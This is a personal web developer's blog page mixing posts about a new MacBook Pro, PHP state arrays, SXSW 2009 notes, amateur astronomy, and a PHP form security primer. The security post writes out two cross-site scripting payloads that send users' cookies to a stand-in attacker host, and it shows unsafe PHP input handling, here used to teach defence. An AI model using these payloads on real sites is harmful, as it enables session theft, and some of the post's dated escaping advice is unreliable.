BLOG: Mitch Wilson, Austin TX Web & Multimedia Developer – Austin, TX

New Macbook Pro laptop

Macbook Pro

I've done it. The desktop is on the way of the dinosaur. Large and still thrilling. But too big to survive in today's world. I had to get a better laptop. My ghettotop wasn't cutting it anymore. Having a desktop is great when you need to sit at a desk. But having to sit at a desk when you need to work is not so great.

So what kind of laptop did I get?

I got a really sweet deal on a new Macbook Pro (MB470LL/A).

It came with just 2GB of ram but I can easily upgrade that when needed. I'm doing a lot more coding now and less graphics work, so I think I'll be fine with just the 2GB. Hah!, "just the 2GB." And it's DDR3 RAM. Nice.

The screen is 15.4 inches. I thought about getting the 17 inch but frankly didn't want to shell out the cash. Besides, I want it to be as portable as possible. If I need a bigger screen at home, I'll have a reason to buy big one .

The hard drive is only the 5400 speed but like I said, I'm not doing a lot of graphics work. And it's 250 GB, large enough and I already have an external drive. Oh yeh, and it has the SuperDrive for burning.

All I need now is a wireless mighty mouse. I wasn't impressed with the docking station options I found. The word monstrosity comes to mind. The Apple Cinema Display would be nice! But I think I'll find my 15.4 inch screen very comfy. Yeh.

List of states as PHP array

Here are two PHP arrays: states and states_short. Use either of these to populate a select element drop down list used to select the state in an HTML form.

Copy, paste and enjoy!


$states_short = array(
'AL'=>'AL',
'AK'=>'AK',
'AZ'=>'AZ',
'AR'=>'AR',
'CA'=>'CA',
'CO'=>'CO',
'CT'=>'CT',
'DE'=>'DE',
'DC'=>'DC',
'FL'=>'FL',
'GA'=>'GA',
'HI'=>'HI',
'ID'=>'ID',
'IL'=>'IL',
'IN'=>'IN',
'IA'=>'IA',
'KS'=>'KS',
'KY'=>'KY',
'LA'=>'LA',
'ME'=>'ME',
'MD'=>'MD',
'MA'=>'MA',
'MI'=>'MI',
'MN'=>'MN',
'MS'=>'MS',
'MO'=>'MO',
'MT'=>'MT',
'NE'=>'NE',
'NV'=>'NV',
'NH'=>'NH',
'NJ'=>'NJ',
'NM'=>'NM',
'NY'=>'NY',
'NC'=>'NC',
'ND'=>'ND',
'OH'=>'OH',
'OK'=>'OK',
'OR'=>'OR',
'PA'=>'PA',
'RI'=>'RI',
'SC'=>'SC',
'SD'=>'SD',
'TN'=>'TN',
'TX'=>'TX',
'UT'=>'UT',
'VT'=>'VT',
'VA'=>'VA',
'WA'=>'WA',
'WV'=>'WV',
'WI'=>'WI',
'WY'=>'WY'
);



$states = array(
'AL'=>'Alabama',
'AK'=>'Alaska',
'AZ'=>'Arizona',
'AR'=>'Arkansas',
'CA'=>'California',
'CO'=>'Colorado',
'CT'=>'Connecticut',
'DE'=>'Delaware',
'DC'=>'District Of Columbia',
'FL'=>'Florida',
'GA'=>'Georgia',
'HI'=>'Hawaii',
'ID'=>'Idaho',
'IL'=>'Illinois',
'IN'=>'Indiana',
'IA'=>'Iowa',
'KS'=>'Kansas',
'KY'=>'Kentucky',
'LA'=>'Louisiana',
'ME'=>'Maine',
'MD'=>'Maryland',
'MA'=>'Massachusetts',
'MI'=>'Michigan',
'MN'=>'Minnesota',
'MS'=>'Mississippi',
'MO'=>'Missouri',
'MT'=>'Montana',
'NE'=>'Nebraska',
'NV'=>'Nevada',
'NH'=>'New Hampshire',
'NJ'=>'New Jersey',
'NM'=>'New Mexico',
'NY'=>'New York',
'NC'=>'North Carolina',
'ND'=>'North Dakota',
'OH'=>'Ohio',
'OK'=>'Oklahoma',
'OR'=>'Oregon',
'PA'=>'Pennsylvania',
'RI'=>'Rhode Island',
'SC'=>'South Carolina',
'SD'=>'South Dakota',
'TN'=>'Tennessee',
'TX'=>'Texas',
'UT'=>'Utah',
'VT'=>'Vermont',
'VA'=>'Virginia',
'WA'=>'Washington',
'WV'=>'West Virginia',
'WI'=>'Wisconsin',
'WY'=>'Wyoming'
);


HTML, JavaScript and PHP form security

How about a refresher on PHP form security? Follow these simple steps to cover the basics. Then sleep better at night knowing you have improved the World Wide Web. (Seriously, get some good sleep, you need it.)

Know thy enemy

The whole security issue comes from two simple facts:

• First fact: Certain text characters and series of characters have special meaning in programming.
  Example: A left angle bracket, in HTML context, starts a tag. But in JavaScript, it means less than.
• Second fact: Web sites implement online forms that let users upload code to run on the server.
  Example: In the comments form, users type text in various text fields. But is the user entering just plain text and allowed tags, or are they entering carefully crafted text containing HTML, JavaScript or some other language meant to run malicious code either on your server or in another user's browser (while visiting your site)?

Malicious client-side HTML and JavaScript

A left angle bracket, in HTML, starts an HTML tag. The series of characters <script> starts a script tag. If you allow a user to submit html tags in your form, you have just opened the door to attack. For example, here is a common type of attack where the attacker posts a malicious link as part of their message or comment to the target Web site. The following example uses HTML and JavaScript entered in the message body. Any cookies you set for that user (who clicks the link) can be read by the attacker. When a user clicks the link, the browser passes the user's cookie information, from the current Web site (yours), as a query string to their PHP file on the attacker's server:

<a href="http://badsite/attacker.php?cookie=<script>document.cookie;</script>">Click here to win</a>

Of course, if you do not filter out or sanitize the data in any way and allow JavaScript code to run, the attacker wouldn't even need the user to click a link. They would just enter a simple block of JavaScript within a <script> tag in their comment:

Hi, great site! <script>location="http://badsite.com/attacker.php?cookie="+document.cookie;</script>

Now we've seen a client-side attack using HTML, JavaScript and PHP. Let's look at a server side attack example, then we'll see how to combat both of them.

Malicious server-side PHP
By adding \r\n in a field that will be used to create an email header for the PHP mail() function, an attacker can write their own email and send it from your Website to whomever they want. Your site's online email form will be used to spam other people. Only these versions of PHP are affected, PHP 4 <= 4.4.6 and PHP 5 <= 5.2.

The local-part of the e-mail address may use any of these ASCII characters:

• Uppercase and lowercase English letters (a-z, A-Z)
• Digits 0 through 9
• Characters ! # $ % & ' * + - / = ? ^ _ ` { | } ~
• Character . provided that it is not the first nor last character, nor may it appear two or more times consecutively.

1. // copy the value form $_GET to $id

2. $id = $_GET['id'];

3. echo "thanks for sending me $id, dude!";

4.  

5. // just use the $_GET val directly

6. echo 'it\'s even more awesome to grab '.$_GET['id'].' directly from input, right?';

1. // escaped, so not a potential SQL injection threat.

2. $id = mysql_real_escape_string($_GET['id']);

3. echo "Now I know that $id is totally safe to insert into my database";

4.  

5. // cast as int, so

6. $id = intval($_GET['id']);

7. echo "$id is most certainly an integer now";

Ninja Webmaster Techniques

• Encode using htmlentities()
• Strip suspicious special characters like backslashes and curly braces

HTML and JavaScript InjectionPHP mail() Header Vulnerabilities

• Cross site scripting (XSS)
  Example: Adding a script tag in a comment on your site to read your user's cookies.
• Input injection
  Example: Adding malicious PHP code in your form field then submitting to run on your server.
• Mail header injection
  Example: Adding \r\n in an email form field and then adding custom malicious email headers to send spam from your Website.

Disclaimer

I am not a security professional. I am a Web developer, like you. I presented common best practices. In addition, you should have a professional hosting service or server administrator who knows what they are doing, and you should communicate with them and follow their advice to make sure your Web site is as secure as possible.

Day 2: SXSW Interactive 2009

Day two, I coverd 5 sessions. That's right. I session jumped the last three all in one hour, 20 minutes each.

Even Faster Websites

Steve Souders wrote the book, "High Performance Web sites" published by O'Reilly in 2007. He is methodical and makes extensive use of yslow and a packet sniffer. Steve demonstrated the performance hit of including inline JavaScript after a link to an external CSS stylesheet. Bascially, the browser will wait for the CSS to finish downloading before proceeding to execute the JavaScript. Other insights included no not using HTML to write script elements. Instead, dynamically add the script element. Doing so avoids inline Javascript that blocks parallel downloading.

First Year as a Freelancer

This was a session I will have to write more on later, since I took so many notes. I'll just say that I was really inspired by this session and made some contacts for possible collaboration later.

Freelance to Agency

A panel discussion with some really smart people nice enough to share their wisdom: Kristina Halvorson (Brain Traffic), Jeffrey Zeldman (Happy Cog, A List Apart, Zeldman.com) , Roger Black and Whitney Hess. If you have't guessed, I'm a full-time freelancer now. So this was a welcome follow up to the previous session about freelancing as well.

Interface Lessons Learned from Games

It's really late and I am going to stop writing very soon. More on this and the rest later.

I saw Jupiter and it’s moons this morning

Between 6:45 and 6:55 AM this morning, I observed Jupiter and it's four largest moons: Io, Europa, Ganymede and Callisto. Above but getting low On the South Eastern horizon, you could see Jupiter with the naked eye. With a telescope, I could make out four moons as well. I posted a drawing of my observation to flickr.

Will I see galaxies tonight?

I've learned that using a telescope is a lot more involved than I had expected. (But also more fun.) I have spotted Saturn and learned several stars and constellations. But I really want to see something more interesting, like a galaxy. Weather ruined my previous plan, so tonight I am hoping for better luck. The weather is supposed to be clear or partly cloudy.

I have four galaxies picked out:

• Bode's Galaxy (M81)
• Cigar Galaxy(M82)
• M108
• M109

All four galaxies are near The Big Dipper, which is easy to find.

Searching for the Pinwheel and Whirlpool galaxies

Last night at 3am I spent a good hour, at least, outside in the cold looking up in the sky. My back hurt. I had on two jackets but was still cold. I was hungry. Oh yeh, and I was very, very tired. And I never found my target, the Hercules globular cluster. Isn't astronomy great!

Tonight I am hoping for better luck, and dare I say, skill. I learned a lot last night, my first real night star watching. I had found Saturn on several occasions but I had not yet tried to find any deep space objects, until now. I'm not just an amateur astronomer; I'm a beginning amateur astronomer.

Tonight, most of all, I hope to find the following:

• Whirlpool Galaxy (M51)
• Pinwheel Galaxy (M101)

These two galaxies are both close to the star, Alkaid, the end star in the handle of the Big Dipper. So they should be easy to find, right?

I planned it all out. Tonight, at 1am, the two galaxies should be at a good vertical position in the sky, high enough to get a angle through the atmosphere but not so high that I strain my neck looking straight up for minutes on end. How do I know where they will be at 1am? Starry Night is an extremely helpful and cool software application that maps stars etc. by date and time. I can set the date and time to display to see the positions of stars and other objects in the sky at that time.

I am excited about tonight. Last night was a good learning experience but disappointing. I never found the Hercules globular cluster. I am hoping the Whirlpool and Pinwheel galaxies will be easier targets.

Update

It was too cloudy that night. Bummer.